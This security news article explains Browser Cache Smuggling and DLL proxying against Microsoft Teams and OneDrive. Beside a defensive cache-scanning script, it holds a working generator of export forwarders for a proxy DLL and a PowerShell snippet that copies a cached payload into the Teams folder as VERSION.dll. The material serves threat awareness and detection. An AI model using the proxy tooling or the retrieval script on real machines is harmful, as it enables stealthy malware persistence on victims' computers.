Emerging Threat: Hackers Exploit Browser Cache and DLL Proxying to Target Microsoft Teams and OneDrive
A newly discovered attack method that combines browser cache manipulation and DLL proxying has emerged as a significant cybersecurity risk for organizations using Microsoft Teams and OneDrive.
Browser Cache Smuggling: A Stealthy Malware Delivery Technique
Known as Browser Cache Smuggling, this technique enables cybercriminals to bypass traditional security defenses by exploiting web browsers' caching mechanisms to deliver malware disguised as legitimate files.
Modern browsers cache static resources such as images and JavaScript to speed up page loads. Attackers abuse this by hosting a malicious DLL on a web page and serving it as if it were a harmless resource.
When a user visits the page, the server returns the DLL with a benign Content-Type (for example image/jpeg) and cacheable response headers, so the browser writes it to its on-disk cache exactly as it would any image, according to Orange Cyberdefense. No download prompt appears, and nothing that looks like an executable download crosses the network.
For example, a compromised HTML page may contain a hidden <img src="/payload.dll">, prompting the browser to store the DLL in its cache.
To complete the attack, the operator socially engineers the victim into running a PowerShell command that locates the cached DLL on disk and copies it into a user-writable application directory, such as the %LOCALAPPDATA% folders used by Microsoft Teams or OneDrive. No administrative rights are needed, because those folders belong to the user.
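The same caching behaviour gives defenders something concrete to hunt for: a cache entry whose body is a PE image but whose stored response headers claim an image or script type. The Python below is an added example, not code from the original article or from Orange Cyberdefense. It runs over constructed sample entries that mimic a Firefox cache2 file (cached body first, then metadata containing the HTTP response headers in clear text); the entry names, the sample bytes and the `scan_directory` path are assumptions. The MZ-at-offset-0 check relies on Firefox storing the body at the start of the entry file; Chromium's cache prepends its own record header, so offsets differ there.

```python
import re
import struct
from pathlib import Path

# Constructed sample cache entries (not real Firefox files). Each value stands in for one
# file under cache2/entries: the cached body first, then the metadata the browser appends,
# which includes the HTTP response headers as plain text. Real entries carry more metadata;
# this check only relies on the header text being present somewhere after the body.
MINIMAL_PE = (
    b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # DOS header, e_lfanew = 0x40
    + b"PE\0\0" + b"\0" * 60                         # PE signature plus padding
)
SAMPLE_ENTRIES = {
    "1A2B3C": MINIMAL_PE
              + b"response-head\0HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nCache-Control: max-age=86400\r\n",
    "4D5E6F": b"\x89PNG\r\n\x1a\n" + b"\0" * 32
              + b"response-head\0HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n",
    "7A8B9C": b"console.log(1);"
              + b"response-head\0HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n",
}

CT_RE = re.compile(rb"content-type:\s*([\w./+-]+)", re.IGNORECASE)


def is_pe(data: bytes) -> bool:
    """True if data starts with an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def declared_content_type(entry: bytes) -> str:
    """Content-Type the server sent, as stored in the entry's trailing metadata ("" if absent)."""
    m = CT_RE.search(entry)
    return m.group(1).decode("ascii", "replace").lower() if m else ""


def scan_entries(entries: dict) -> list:
    """Return (entry_name, declared_type) for every entry whose cached body is a PE image.
    Anything that parses as a PE but was served as an image or script is a smuggling candidate."""
    hits = []
    for name, blob in entries.items():
        if is_pe(blob):
            hits.append((name, declared_content_type(blob)))
    return hits


def scan_directory(entries_dir) -> list:
    """Same check over a real cache2/entries directory (the path is supplied by the caller)."""
    blobs = {p.name: p.read_bytes() for p in Path(entries_dir).iterdir() if p.is_file()}
    return scan_entries(blobs)


if __name__ == "__main__":
    for name, ctype in scan_entries(SAMPLE_ENTRIES):
        print(f"{name}: PE image cached as '{ctype}'")
```

Pointing `scan_directory` at a profile's cache2\entries folder gives the defender the same hit the attacker's retrieval script is looking for, and the declared Content-Type tells you which server lied.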
DLL Proxying: Evading Detection and Maintaining Persistence
To stay undetected and keep the hijacked application working, attackers use DLL proxying.
Applications such as Microsoft Teams resolve DLLs through Windows' DLL search order, and the application's own directory is searched before System32 for any library not on the KnownDLLs list. Dropping a DLL with the right name into that directory therefore gets it loaded into the application's process, without exploiting any bug in the application itself.
The rogue DLL functions as a proxy, forwarding legitimate API calls to the original DLL while simultaneously executing malicious payloads, such as Cobalt Strike beacons.
For instance, if attackers plant a malicious VERSION.dll in the Teams directory (the genuine copy lives in System32), it can:
Execute the payload to establish a command-and-control (C2) connection.
Forward every legitimate API call to the real DLL, so the application keeps running normally.
This approach allows malware to operate stealthily, blending in with routine system activity.
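Building the proxy starts with the genuine DLL's export table: every name it exports has to be re-exported by the rogue DLL and forwarded to the real module, or Teams would fail to load. The Python below is an added example, not Orange Cyberdefense's tooling, that parses a PE export directory and emits the MSVC linker forwarder directives (`/export:Name=module.Name`) a proxy's source would carry. To run offline it builds a constructed minimal PE32+ image carrying three of VERSION.dll's real export names instead of reading C:\Windows\System32\version.dll; that sample image, the module name `version_orig` (the renamed copy of the real DLL placed beside the proxy) and the forwarder target shown are assumptions.

```python
import struct
import sys

REAL_MODULE = "version_orig"   # assumed name of the renamed genuine DLL sitting beside the proxy

# Constructed export list: real VERSION.dll export names, one written as an API-set forwarder
# the way the parser must handle it (the forwarder target is an assumption for this sample).
SAMPLE_EXPORTS = [
    (b"GetFileVersionInfoA", None),
    (b"GetFileVersionInfoSizeW", b"api-ms-win-core-version-l1-1-0.GetFileVersionInfoSizeW"),
    (b"VerQueryValueW", None),
]


def build_sample_dll(exports, dll_name=b"VERSION.dll"):
    """Constructed minimal PE32+ DLL: one section holding nothing but an export directory.
    exports: list of (name, forwarder) where forwarder is None or b"module.Func"."""
    sec_va, sec_raw = 0x1000, 0x200
    n = len(exports)
    dir_rva = sec_va
    funcs_rva = dir_rva + 40
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    strings_rva = ords_rva + 2 * n
    strtab = bytearray(dll_name + b"\0")
    name_rvas, func_rvas = [], []
    for name, fwd in exports:
        name_rvas.append(strings_rva + len(strtab))
        strtab += name + b"\0"
        if fwd is None:
            func_rvas.append(0x2000 + 0x10 * len(func_rvas))   # pretend code address
        else:
            func_rvas.append(strings_rva + len(strtab))          # forwarder: RVA of a string inside the export dir
            strtab += fwd + b"\0"
    exp_dir = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, strings_rva, 1, n, n, funcs_rva, names_rva, ords_rva)
    section = (exp_dir
               + b"".join(struct.pack("<I", r) for r in func_rvas)
               + b"".join(struct.pack("<I", r) for r in name_rvas)
               + b"".join(struct.pack("<H", i) for i in range(n))
               + bytes(strtab))
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # x64, 1 section, DLL
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                          # PE32+ magic
    struct.pack_into("<II", opt, 112, dir_rva, len(section))       # DataDirectory[0] = export table
    sec_hdr = b".rdata".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(section), sec_va, len(section), sec_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + sec_hdr
    return bytes(headers.ljust(sec_raw, b"\0") + section)


SAMPLE_DLL = build_sample_dll(SAMPLE_EXPORTS)


def _rva_to_off(rva, sections):
    for va, size, raw in sections:
        if va <= rva < va + size:
            return rva - va + raw
    raise ValueError(f"RVA {rva:#x} not in any section")


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def parse_exports(data):
    """Return [(ordinal, name, forwarder_or_None)] from a PE file's export directory."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_off = opt + (112 if magic == 0x20B else 96)     # DataDirectory offset differs for PE32+ / PE32
    exp_rva, exp_size = struct.unpack_from("<II", data, dd_off)
    sections = []
    for i in range(nsec):
        vsize, va, rsize, raw = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, max(vsize, rsize), raw))
    d = _rva_to_off(exp_rva, sections)
    (_, _, _, _, _, base, nfuncs, nnames,
     funcs_rva, names_rva, ords_rva) = struct.unpack_from("<IIHHIIIIIII", data, d)
    funcs = struct.unpack_from(f"<{nfuncs}I", data, _rva_to_off(funcs_rva, sections))
    names = struct.unpack_from(f"<{nnames}I", data, _rva_to_off(names_rva, sections))
    ords = struct.unpack_from(f"<{nnames}H", data, _rva_to_off(ords_rva, sections))
    out = []
    for name_rva, idx in zip(names, ords):
        rva = funcs[idx]
        # A function RVA that lands inside the export directory is not code: it points at a
        # "module.Func" string, i.e. the export is itself forwarded to another DLL.
        fwd = _cstr(data, _rva_to_off(rva, sections)) if exp_rva <= rva < exp_rva + exp_size else None
        out.append((base + idx, _cstr(data, _rva_to_off(name_rva, sections)), fwd))
    return out


def proxy_pragmas(data, real_module=REAL_MODULE):
    """One MSVC linker directive per export: the proxy re-exports the name and forwards it to the real DLL."""
    return [f'#pragma comment(linker, "/export:{name}={real_module}.{name},@{ordinal}")'
            for ordinal, name, _ in parse_exports(data)]


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DLL
    print("\n".join(proxy_pragmas(blob)))
```

Run it with a path argument to list the directives for a real DLL. The payload would live in the proxy's DllMain, which this generator deliberately does not emit; the forwarders only keep the application functional, which is the half of the technique that keeps the hijack invisible to the user. Where the parser reports an export that the genuine DLL already forwards elsewhere, the proxy can forward straight to that target instead of the renamed copy.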
Why Microsoft Teams and OneDrive Are Prime Targets
Orange Cyberdefense identified Microsoft Teams and OneDrive as ideal attack vectors because:
They install into the user's profile (%LOCALAPPDATA%) and run with ordinary user privileges, so planting a DLL next to them needs no admin rights.
Their frequent internet communication helps disguise malicious traffic.
On the endpoint, a PowerShell snippet walks the browser cache (for Firefox, cache2\entries under the profile), finds the smuggled entry and copies it into the Teams directory under the name of the DLL to hijack. Because the file entered the host as a cached "image" rather than as an executable download, network-based controls such as download inspection never see a DLL.
```powershell
# Walk the Firefox cache2 entries, look for the marker string the attacker placed in the
# payload, and copy the matching entry into the Teams directory under the hijacked DLL name.
foreach ($f in @("$env:LOCALAPPDATA\Mozilla\Firefox\Profiles\*.default-release\cache2\entries\")) {
    gci $f -r | % {
        if (Select-String -Pattern "PAYLOAD" -Path $_.FullName) {
            cp $_.FullName "$env:LOCALAPPDATA\Microsoft\Teams\VERSION.dll"
        }
    }
}
```
With an estimated 78% of enterprises relying on Microsoft 365, this technique presents a widespread and pressing security risk.
As organizations and browsers increasingly adopt stricter caching policies, both security teams and ethical hackers must stay ahead of these evolving threats.
Initially disclosed at Insomni’hack 2025, this attack underscores the importance of layered cybersecurity defenses to mitigate the risk of socially engineered threats that exploit trusted software.